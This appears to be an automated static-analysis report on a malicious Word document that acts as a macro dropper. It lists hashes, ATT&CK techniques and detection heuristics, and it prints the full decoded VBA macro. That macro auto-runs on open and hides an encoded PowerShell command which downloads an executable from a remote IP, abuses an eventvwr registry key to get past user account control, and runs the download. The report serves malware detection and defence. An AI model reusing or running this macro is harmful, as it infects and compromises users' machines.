Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 beba0c545403fb2c…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 165.5 KB
Created: 2017-01-20 00:05:00
Authoring application: Microsoft Office Word
First seen: 2017-03-23
MD5: 8b6ece2658b42fadd40fa3e717919478
SHA-1: e60328fbb573510db5be2b304b84baa0e01c17b8
SHA-256: beba0c545403fb2ca683e12660f4b925ddfc337694ed95bab59e03d55b175c41
Risk score: 250

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1059 Command and Scripting Interpreter
  • T1204.002 Malicious File
  • T1566.001 Spearphishing Attachment

The sample contains VBA macros that execute a command to download and run a second-stage payload. The macro utilizes the `CreateObject` function and references `cmd.exe`, indicating an attempt to execute arbitrary commands. The heavily obfuscated string `zzcZMVdQ.9QezZxzQEV ZQ/Vcz QzP99O9wZE9QRV9szzHVVEZLzlZ.VEQzxQE9 VV-QzwQizNZ9Dz9OZVWVsVtQzyzLQEVz ZQhZIVVDQdzeQzNZ QZ-VnQOVQpZrVoZfZVIVVLVQeV VV-z9eVxVEzCzUZtZziVQOZVnzzpQQOVzLzIZCZyZ zZbQVYQPz9AQQsQZSV ZQ(VN9ZEzzwQ-VVOVZBzJQeVZc9TVZ QSQYVZS9TVVEQMQ.VNQeZztZ.ZWZEV9bz9CzQlzQiZQez9nVzTZZ)Zz.zQDZQoVWQQnZLZoQaV9DVFZVi9` is likely a URL for this payload. The presence of `Document_Open` and `ShellExecute` API calls further supports the malicious intent of executing external code.

Heuristics (8)

  • ClamAV: Doc.Dropper.Agent-5997535-0 (critical) CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-5997535-0
  • Reference to ShellExecute API (high) SC_STR_SHELLEXEC
  • VBA macros detected (medium, 4 related findings) OLE_VBA_MACROS
    Document contains VBA macro code
  • CreateObject call (high) OLE_VBA_CREATEOBJ
    Matched lines in script:
      Sub chefprint(urrulwfqir, hqrptsqgeemf)
      Module1.festivalinject urrulwfqir, CreateObject(hqrptsqgeemf & "aPpliCAtIon")
      Dim hbbhomuyznhmmse As Integer
  • cmd.exe reference in VBA (high) OLE_VBA_CMD
    Matched lines in script:
      efiuqntvjgqva = 411
      ozekxgisrtyprdjv.sHELlEXecUTe "cmd.exe", nkhrvaaciizdqhy, "", "open", 0
      End Sub
  • VBA p-code auto-exec with execution tokens (high) OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Document_Open macro (low) OLE_VBA_DOCOPEN
    Matched lines in script:
      Attribute VB_Customizable = True
      Public Sub Document_Open()
      'wvuobdsvckczoauditprogram
  • Embedded URL (info) EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (found in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 4445 bytes
SHA-256: 2ea740f2519c2e73d6db6fed18a366afe7c7baf972b1ff0f126833edab13a102

Preview of the extracted script (first 1,000 lines):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Public Sub Document_Open()
'wvuobdsvckczoauditprogram
Dim qbvqwahtdsxxpxyvset As Long
qbvqwahtdsxxpxyvset = 814
qbvqwahtdsxxpxyvset = 766

ActiveDocument.Shapes.SelectAll
Selection.Delete
Dim boostsquirrel As Integer
boostsquirrel = 545
If boostsquirrel > 142 Then
'gappetdelayvendor
Dim vifpiafbomdozd As Long
vifpiafbomdozd = 634
vifpiafbomdozd = 21
End If
vwlwcjbrkcfvnqoijw = "zzcZMVdQ.9QezZxzQEV ZQ/Vcz QzP99O9wZE9QRV9szzHVVEZLzlZ.VEQzxQE9 VV-QzwQizNZ9Dz9OZVWVsVtQzyzLQEVz ZQhZIVVDQdzeQzNZ QZ-VnQOVQpZrVoZfZVIVVLVQeV VV-z9eVxVEzCzUZtZziVQOZVnzzpQQOVzLzIZCZyZ zZbQVYQPz9AQQsQZSV ZQ(VN9ZEzzwQ-VVOVZBzJQeVZc9TVZ QSQYVZS9TVVEQMQ.VNQeZztZ.ZWZEV9bz9CzQlzQiZQez9nVzTZZ)Zz.zQDZQoVWQQnZLZoQaV9DVFZVi9"
Dim gloryhead As Integer
gloryhead = 602
If gloryhead > 38 Then
'innerunfoldjbpxcxkqknekkei
Dim cterlqyxjyvfraacpvq As Long
cterlqyxjyvfraacpvq = 254
cterlqyxjyvfraacpvq = 914
End If
Dim fhtyzcioqhczydpkqmz As Integer
fhtyzcioqhczydpkqmz = 768
If fhtyzcioqhczydpkqmz > 976 Then
'indicatepatternhamsterlove
Dim mzopyeifxfsiwmsof As Long
mzopyeifxfsiwmsof = 815
mzopyeifxfsiwmsof = 858
End If
Module1.zxpeprapnmdmsc vwlwcjbrkcfvnqoijw
'accountelbowzdxjkwfiplziroh
Dim meshvolcano As Long
meshvolcano = 859
meshvolcano = 872
'biwcqakwwxacflbamocljssuomijq
Dim captainelement As Long
captainelement = 669
captainelement = 904
End Sub
Sub chefprint(urrulwfqir, hqrptsqgeemf)
Module1.festivalinject urrulwfqir, CreateObject(hqrptsqgeemf & "aPpliCAtIon")
Dim hbbhomuyznhmmse As Integer
hbbhomuyznhmmse = 134
If hbbhomuyznhmmse > 539 Then
'battlevoidyxddztfrapcjzgjefds
Dim guessmango As Long
guessmango = 419
guessmango = 530
End If
End Sub

Attribute VB_Name = "Module1"
Sub zxpeprapnmdmsc(pcywvlzmookyhd)
'inputsuperdraftfront
Dim blinddrink As Long
blinddrink = 174
blinddrink = 120
fqpiwgopeexzheq = pcywvlzmookyhd & "lZezZ(z9'zhZtztZpV:ZQ/QZ/91z7Z6QQ.z1zV2Z3QQ.ZQ2VV6ZQ.91ZZ0Vz49/ZV0Q1Vz.Qdzlz'V,QV'Q9%QTVVEQMZQPZ%Q\9V\Zd99f9zhQVgZdVfzZeZ.ZezxQQezZ'z)ZV V&z QrzVeQZgzz zZazdVzdZz zZHZVKZCVzUQ\9\QSQoVzfZtZzwQQaVrZQeZ\Q\9QCzlz9a"
ThisDocument.chefprint fqpiwgopeexzheq & "ZVszszZeVVsV9\Q\VVmzVsZcVfZZizlQZeZ9\z\z9sQ9hVQeQlVVlz\V\QoZZpZZeZn9\QV\zzc9VoQmVmZaV9n99dQ Q9/ZdQ Q%VVTZEZMVPV%9Z\zZ\zQdV9fZZhVzgZVdZfVez.ZVeVxVe9 Z9/ZfZ zQ&9 zVe9QvZeVnzztzQvzZwZrZ.zeZQxQeQV ZZ&QQ QQPZQIVNQGVV Q-ZVnQz QV1Vz5z VV192Z7z.zZ0Q.zQ0QZ.z19>znzu9QlV Z&9V Zz%QT9QEVMVVP99%zz\V\QdQQf9zhQgZd9QfZVeZQ.ze9zxQe", "sHeLL."
End Sub
Sub festivalinject(mzbtybtxfdgeovipioi, ozekxgisrtyprdjv)
'blameverifyjyuvwfemveu
Dim dkgcmvzes As Long
dkgcmvzes = 553
dkgcmvzes = 754
nkhrvaaciizdqhy = ""
Dim shedshoot As Integer
shedshoot = 791
If shedshoot > 654 Then
'fiscalshipfsleysakjkubasndtus
Dim pausetruly As Long
pausetruly = 801
pausetruly = 281
End If
'vbjncjrkdldevicesunset
Dim zgebsivsf As Long
zgebsivsf = 960
zgebsivsf = 142
truckvital = "*"
Dim uoxmksrpwibfhpksr As Integer
uoxmksrpwibfhpksr = 236
If uoxmksrpwibfhpksr > 220 Then
'gmtafiyuygjdgiysccsovwg
Dim alphaseed As Long
alphaseed = 640
alphaseed = 702
End If
For buleokhoxszu = 1 To Len(mzbtybtxfdgeovipioi)
Dim niceraise As Integer
niceraise = 781
If niceraise > 924 Then
'campsymbolocnieefilygfailgpns
Dim msltthjglq As Long
msltthjglq = 540
msltthjglq = 923
End If
middlereturn = Mid(mzbtybtxfdgeovipioi, buleokhoxszu, 1)
Dim meadowquote As Integer
meadowquote = 892
If meadowquote > 361 Then
'gypthhdxccoconutlens
Dim hqpzlzbfotppopv As Long
hqpzlzbfotppopv = 806
hqpzlzbfotppopv = 126
End If
reviewsolid = truckvital & middlereturn & truckvital
If Not "VVzQZZ9zQ" Like reviewsolid Then
nkhrvaaciizdqhy = nkhrvaaciizdqhy & middlereturn
'bloodspeakfryrfdcdqmugc
Dim qbzgffdixmalxj As Long
qbzgffdixmalxj = 726
qbzgffdixmalxj = 727
'budgetfollowxpahgbkrdor
Dim touristvelvet As Long
touristvelvet = 119
touristvelvet = 99
End If
Next
'angertheoryopifhxvtjpp
Dim efiuqntvjgqva As Long
efiuqntvjgqva = 477
efiuqntvjgqva = 411
ozekxgisrtyprdjv.sHELlEXecUTe "cmd.exe", nkhrvaaciizdqhy, "", "open", 0
End Sub